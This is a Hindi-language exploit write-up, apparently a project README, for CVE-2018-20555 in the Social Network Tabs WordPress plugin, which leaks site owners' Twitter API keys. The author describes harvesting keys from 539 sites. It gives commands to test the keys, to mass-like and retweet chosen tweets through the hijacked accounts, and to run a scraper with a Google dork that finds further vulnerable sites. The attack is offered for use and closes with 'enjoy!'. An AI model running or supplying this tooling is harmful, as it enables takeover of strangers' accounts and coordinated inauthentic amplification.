
CVE-2018-20555 के लिए एक्सप्लॉइट: कमजोर Social Network Tabs WordPress प्लगइन में लीक हुई API कुंजियों के माध्यम से Twitter खातों की स्वचालित खोज और अधिग्रहण, स्क्रैपिंग और बड़े पैमाने पर शोषण क्षमताओं के साथ।
Design Chemical कंपनी द्वारा बनाया गया Social Network Tabs नामक WordPress प्लगइन, अपने उपयोगकर्ता के Twitter access_token, access_token_secret, consumer_key और consumer_secret को दो बार लीक कर रहा है, जिसके कारण उनके Twitter खाते पर कब्ज़ा हो जाता है।
यह Twitter विजेट प्रदर्शित होने वाले पृष्ठ के भीतर कोड की निम्नलिखित पंक्तियों के कारण होता है:
jQuery(document).ready(function ($) {
var config = {
widgets: "twitter,facebook,youtube",
twitterId: "[redacted]",
facebookId: "[redacted]",
youtubeId: "[redacted]",
twitter: {
url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
title: "Latest Tweets",
follow: "Follow",
followId: "",
limit: "10",
retweets: true,
replies: true,
images: "thumb",
consumer_key: "[redacted]",
consumer_secret: "[redacted]",
access_token: "[redacted]",
access_token_secret: "[redacted]"
},
}
});
Publicwww की मदद से, निम्नलिखित खोज क्वेरीज़ के द्वारा, मैं 539 असुरक्षित वेबसाइटों से Twitter access_token, access_token_secret, consumer_key और consumer_secret प्राप्त करने में सफल रहा:
सभी कुंजियाँ twitter_keys.csv में उपलब्ध हैं।
twitter_keys.csv में Twitter API कुंजियों का परीक्षण करें
python test_twitter_api_keys.py -t
पहली बार जब मैंने यह कमांड चलाया, तो मुझे 446 Twitter खातों की जानकारी मिली। यह उल्लेखनीय है कि सूची में 2 सत्यापित खाते थे और कई खातों के 10K+ से अधिक अनुयायी थे। सभी असुरक्षित खाते vulnerable_accounts.txt में हैं।
अपनी पसंद के ट्वीट को लाइक करें
python test_twitter_api_keys.py -l [tweet_id]
अपनी पसंद के ट्वीट को रीट्वीट करें
python test_twitter_api_keys.py -r [tweet_id]
जब मैंने पहली बार यह कमांड चलाया, तो मैंने अपनी पसंद के ट्वीट को 127 बार लाइक करने में सफल रहा, जिससे पता चला कि 127 Twitter API कुंजियों में पढ़ने-लिखने के अधिकार थे, यानी मैं इस कुंजी रिसाव के कारण 127 Twitter खातों (प्रोफ़ाइल चित्र बदलना, लाइक, रीट्वीट, बायो बदलना, ...) पर कब्ज़ा करने में सक्षम था।
कई वेबसाइटें और इसलिए Twitter खाते अभी भी इस समस्या के प्रति असुरक्षित हैं। उन्हें पहचानने के लिए, मैंने एक स्क्रेपर बनाया
cd TwitterApiKeysSearchEngine/
scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10
इस Google खोज क्वेरी के कुल परिणाम 3550 हैं। पहले 9 पृष्ठों में से, मैं 78 कुंजियाँ (86%) प्राप्त करने में सफल रहा। आनंद लीजिए!
Twitter पर मुझे फॉलो करें! आप मेरे काम का एक छोटा सा हिस्सा https://fs0c131y.com पर भी पा सकते हैं।
यह जाँच और POC ❤️ के साथ @fs0c131y द्वारा बनाया गया है।